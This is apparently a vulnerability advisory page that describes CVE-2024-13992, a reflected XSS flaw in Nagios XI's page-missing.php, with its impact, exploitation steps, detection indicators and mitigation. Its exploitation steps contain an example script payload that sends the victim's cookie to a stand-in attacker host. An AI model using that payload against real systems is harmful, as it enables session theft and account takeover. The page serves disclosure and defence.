Register for the AI for Security Summit: Join Figma, Perplexity & Wiz

CVE-2024-13992
Nagios XI vulnerability analysis and mitigation

Overview

CVE-2024-13992 is a reflected Cross-Site Scripting (XSS) vulnerability in Nagios XI affecting all versions prior to 2024R1.1. The vulnerable component, page-missing.php, fails to properly validate or escape user-supplied input when rendering the 404 "missing page" error, allowing an attacker to craft a malicious link that executes arbitrary JavaScript in a victim's browser within the Nagios XI domain. The vulnerability was published on October 31, 2025, and assigned by VulnCheck. It carries a CVSS v3.1 base score of 5.4 (Medium) and a CVSS v4.0 base score of 5.1 (Medium) (Red Hat Advisory, Nagios Security).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), classified as a reflected XSS pattern (CAPEC-591). The vulnerable file page-missing.php reflects user-controlled input — likely URL path or query parameters — directly into the HTML response without adequate sanitization or output encoding. An attacker must craft a malicious URL pointing to the Nagios XI 404 page and socially engineer an authenticated victim into clicking it; the victim's browser then executes the injected JavaScript within the Nagios XI origin. Exploitation requires low privileges (an authenticated user context) and passive user interaction (Nagios Security, VulnCheck Advisory).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the victim's browser under the Nagios XI domain, enabling session token theft, credential harvesting, and performing unauthorized actions on behalf of the victim within the application. Because Nagios XI is a network monitoring platform with privileged access to infrastructure data, a compromised administrator session could expose sensitive host/service configurations, credentials stored in the platform, or enable further lateral movement into monitored systems. Confidentiality and integrity impacts are limited in scope (low), and there is no direct availability impact (Red Hat Advisory, Nagios Security).

Exploitability

As of the time of publication, there is no public proof-of-concept exploit and no evidence of in-the-wild exploitation (Red Hat Advisory). The EPSS score is approximately 0.55%, indicating a low probability of exploitation in the near term. The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. No threat actor attribution has been reported.

Exploitation steps

  1. Reconnaissance: Identify a target Nagios XI instance running a version prior to 2024R1.1 that is accessible to the intended victim (e.g., via internal network or internet exposure).
  2. Craft malicious URL: Construct a URL targeting the Nagios XI 404 handler (page-missing.php) with a payload injected into a URL parameter or path segment that will be reflected unsanitized, e.g., https://<nagios-xi-host>/nagiosxi/page-missing.php?<param>=<script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  3. Deliver the link: Send the crafted URL to an authenticated Nagios XI user via phishing email, chat message, or embed it in a third-party website the victim is likely to visit.
  4. Victim clicks the link: When the authenticated victim follows the link, their browser loads the Nagios XI 404 page, which reflects the unsanitized payload and executes the injected JavaScript within the Nagios XI domain.
  5. Harvest session data: The injected script exfiltrates the victim's session cookie or performs actions (e.g., adding admin accounts, exporting configuration data) on behalf of the victim within Nagios XI (VulnCheck Advisory, Nagios Security).

Indicators of compromise

  • Network: Outbound HTTP requests from a victim's browser to an external attacker-controlled domain immediately after loading a Nagios XI 404 page; unusual GET/POST requests to page-missing.php with encoded JavaScript payloads in URL parameters.
  • Logs: Nagios XI web server access logs showing requests to page-missing.php with URL-encoded script tags or JavaScript event handlers (e.g., %3Cscript%3E, onerror=, onload=) in query strings or path components.
  • Browser/Proxy: Proxy or endpoint detection logs showing a user navigating to a Nagios XI 404 URL originating from an external referrer, followed by an unexpected outbound connection to an unknown host.

Mitigation and workarounds

Nagios has released version 2024R1.1 which addresses this vulnerability; administrators should upgrade immediately (Nagios Changelog, Nagios Security). As interim mitigations, organizations should implement a strict Content Security Policy (CSP) header to limit script execution origins, enforce output encoding on all user-supplied inputs, and restrict access to the Nagios XI interface to trusted networks or VPN. Users should also be educated to avoid clicking links to Nagios XI from untrusted external sources.

Community reactions

The vulnerability received routine coverage from vulnerability tracking platforms and aggregators (NVD, VulDB, Vulners, CIRCL) shortly after publication on October 31, 2025. A brief mention appeared on Bluesky via automated CVE notification accounts. No notable independent researcher commentary, vendor blog posts, or significant media coverage has been identified beyond the official Nagios security advisory and VulnCheck's advisory.

Additional resources


SourceThis report was generated using AI

Related Nagios XI vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-48554HIGH7.7
  • Nagios logoNagios
  • cpe:2.3:a:nagios:nagios_xi
NoNoAug 12, 2026
CVE-2026-48553HIGH7.7
  • Nagios logoNagios
  • cpe:2.3:a:nagios:nagios_xi
NoNoAug 12, 2026
CVE-2026-48549MEDIUM6.9
  • Nagios logoNagios
  • cpe:2.3:a:nagios:nagios_xi
NoNoAug 26, 2026
CVE-2023-24035LOW3.5
  • Nagios XI logoNagios XI
  • cpe:2.3:a:nagios:nagios_xi
NoYesSep 14, 2026
CVE-2023-24034LOW3.1
  • Nagios XI logoNagios XI
  • cpe:2.3:a:nagios:nagios_xi
NoYesSep 14, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management